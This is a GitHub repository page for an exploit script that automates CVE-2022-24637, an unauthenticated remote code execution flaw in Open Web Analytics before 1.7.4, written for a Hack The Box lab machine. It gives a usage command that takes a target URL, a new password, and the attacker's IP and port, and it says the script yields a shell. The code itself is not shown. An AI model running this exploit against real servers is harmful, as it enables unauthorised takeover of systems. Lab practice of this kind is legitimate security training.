Skip to content

Unauthenticated RCE in Open Web Analytics version <1.7.4

Notifications You must be signed in to change notification settings

0xM4hm0ud/CVE-2022-24637

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2022-24637

Unauthenticated RCE in Open Web Analytics version <1.7.4

This script is made to automate the CVE-2022-24637 vulnerability. I created this exploit for my Hackthebox machine vessel. https://app.hackthebox.com/machines/Vessel

The exploit and idea is based on https://devel0pment.de/?p=2494

exploit

Run the script with the following parameters:

python3 exploit.py http://<url>/ newPassword YourIp YourPort

It might be possible that you need to run it a few times to get a shell.

The script can be improved.

img

About

Unauthenticated RCE in Open Web Analytics version <1.7.4

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages